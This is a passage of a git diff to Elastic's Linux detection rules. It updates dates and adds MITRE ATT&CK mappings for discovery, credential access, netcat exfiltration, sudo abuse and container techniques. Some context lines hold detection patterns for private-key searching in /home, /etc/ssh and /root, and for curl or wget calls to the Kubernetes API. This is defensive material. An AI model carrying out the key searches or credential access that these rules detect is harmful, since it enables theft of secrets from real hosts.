@@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,6 +115,11 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_private_key_password_searching_activity.toml b/rules/linux/discovery_private_key_password_searching_activity.toml index 413d337fc5a..b5aaf68561b 100644 --- a/rules/linux/discovery_private_key_password_searching_activity.toml +++ b/rules/linux/discovery_private_key_password_searching_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ process.command_line like ("*/home/*", "*/etc/ssh*", "*/root/*", "/") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" @@ -128,6 +133,11 @@ id = "T1552.001" name = "Credentials In Files" reference = "https://attack.mitre.org/techniques/T1552/001/" +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/discovery_process_capabilities.toml b/rules/linux/discovery_process_capabilities.toml index 41b4c8bda26..17213c9ac70 100644 
--- a/rules/linux/discovery_process_capabilities.toml +++ b/rules/linux/discovery_process_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,6 +105,11 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_security_file_access_via_common_utility.toml b/rules/linux/discovery_security_file_access_via_common_utility.toml index c80d995820a..8651c5b6ca2 100644 --- a/rules/linux/discovery_security_file_access_via_common_utility.toml +++ b/rules/linux/discovery_security_file_access_via_common_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,7 +125,30 @@ process.args like ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" 
diff --git a/rules/linux/discovery_subnet_scanning_activity_from_compromised_host.toml b/rules/linux/discovery_subnet_scanning_activity_from_compromised_host.toml index 6f3aab1b3ca..a7db2fe6646 100644 --- a/rules/linux/discovery_subnet_scanning_activity_from_compromised_host.toml +++ b/rules/linux/discovery_subnet_scanning_activity_from_compromised_host.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -150,6 +150,11 @@ from logs-endpoint.events.network-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" diff --git a/rules/linux/discovery_sudo_allowed_command_enumeration.toml b/rules/linux/discovery_sudo_allowed_command_enumeration.toml index 9c5015f5db1..4dc21585e5e 100644 --- a/rules/linux/discovery_sudo_allowed_command_enumeration.toml +++ b/rules/linux/discovery_sudo_allowed_command_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -106,14 +106,41 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.001" +name = "Local Groups" +reference = "https://attack.mitre.org/techniques/T1069/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/discovery_suspicious_memory_grep_activity.toml b/rules/linux/discovery_suspicious_memory_grep_activity.toml index 56148d7dbb8..7830ed690af 100644 --- a/rules/linux/discovery_suspicious_memory_grep_activity.toml +++ b/rules/linux/discovery_suspicious_memory_grep_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/05" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,6 +90,11 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" 
diff --git a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml index e78382373b9..4bf51659a5f 100644 --- a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml +++ b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -146,3 +146,16 @@ reference = "https://attack.mitre.org/techniques/T1595/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_suspicious_which_command_execution.toml b/rules/linux/discovery_suspicious_which_command_execution.toml index 732545b5d3b..70658812d74 100644 --- a/rules/linux/discovery_suspicious_which_command_execution.toml +++ b/rules/linux/discovery_suspicious_which_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -84,14 +84,23 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_unusual_user_enumeration_via_id.toml b/rules/linux/discovery_unusual_user_enumeration_via_id.toml index e855e9a3297..bd4ae498b4b 100644 --- a/rules/linux/discovery_unusual_user_enumeration_via_id.toml +++ b/rules/linux/discovery_unusual_user_enumeration_via_id.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,6 +109,26 @@ id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.001" +name = "Local Groups" +reference = "https://attack.mitre.org/techniques/T1069/001/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1087/001/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" 
diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml index db90a1ad7af..4fc88b14ba4 100644 --- a/rules/linux/discovery_virtual_machine_fingerprinting.toml +++ b/rules/linux/discovery_virtual_machine_fingerprinting.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,7 +142,35 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_yum_dnf_plugin_detection.toml b/rules/linux/discovery_yum_dnf_plugin_detection.toml index 2d0397313ad..1672b6a16b4 100644 --- a/rules/linux/discovery_yum_dnf_plugin_detection.toml +++ b/rules/linux/discovery_yum_dnf_plugin_detection.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,6 +117,16 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml index 6310d47ea9b..a6c74f46cc4 100644 --- a/rules/linux/execution_abnormal_process_id_file_created.toml +++ b/rules/linux/execution_abnormal_process_id_file_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,6 +153,23 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] 
diff --git a/rules/linux/execution_container_management_binary_launched_inside_container.toml b/rules/linux/execution_container_management_binary_launched_inside_container.toml index f32d2b56652..c2cb790e00e 100644 --- a/rules/linux/execution_container_management_binary_launched_inside_container.toml +++ b/rules/linux/execution_container_management_binary_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1609/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml index ecf13768813..b467de4246f 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -123,6 +123,16 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" diff --git a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml index e3029462837..b2d2d1ad475 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -134,6 +134,16 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" diff --git a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml index 9a89825b302..02db558cf6d 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,14 +132,23 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml index 21393246708..9f190ca97d1 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -148,14 +148,80 @@ process.parent.name in ("foomatic-rip", "cupsd") and process.command_line like ( [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = 
"https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml index 4f987d0a01c..d0e7ede71e6 100644 --- a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml +++ b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,3 +113,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_executable_stack_execution.toml b/rules/linux/execution_executable_stack_execution.toml index db15ac7e5ad..35222dec4d9 100644 --- a/rules/linux/execution_executable_stack_execution.toml +++ b/rules/linux/execution_executable_stack_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2025/01/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -105,3 +105,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1620" +name = "Reflective Code Loading" +reference = "https://attack.mitre.org/techniques/T1620/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_file_execution_followed_by_deletion.toml b/rules/linux/execution_file_execution_followed_by_deletion.toml index d2a3a87c967..b597a771bd4 100644 --- a/rules/linux/execution_file_execution_followed_by_deletion.toml +++ b/rules/linux/execution_file_execution_followed_by_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,3 +123,34 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml index 18431eba5ca..48c6e1b68b6 100644 --- a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml +++ b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,7 +123,35 @@ id = "T1222.002" name = "Linux and Mac File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/002/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml index 59cdf65a41e..308b4452652 100644 --- a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml +++ b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -161,3 +161,34 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[[rule.threat.technique.subtechnique]] +id = "T1048.003" +name = "Exfiltration Over Unencrypted Non-C2 Protocol" +reference = "https://attack.mitre.org/techniques/T1048/003/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/execution_kubectl_apply_pod_from_url.toml b/rules/linux/execution_kubectl_apply_pod_from_url.toml index 7358ddd13d1..93e9de69f4d 100644 --- a/rules/linux/execution_kubectl_apply_pod_from_url.toml +++ b/rules/linux/execution_kubectl_apply_pod_from_url.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -116,16 +116,16 @@ not process.args like~ ("*download.elastic.co*", "*github.com/kubernetes-sigs/*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" reference = "https://attack.mitre.org/techniques/T1609/" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml index 15462abd9f1..f7e21e35d61 100644 --- a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml +++ b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -144,6 +144,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" 
@@ -153,3 +158,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.007" +name = "Container API" +reference = "https://attack.mitre.org/techniques/T1552/007/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml index 7e6e8f09bbf..48f29f64038 100644 --- a/rules/linux/execution_nc_listener_via_rlwrap.toml +++ b/rules/linux/execution_nc_listener_via_rlwrap.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,3 +128,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git 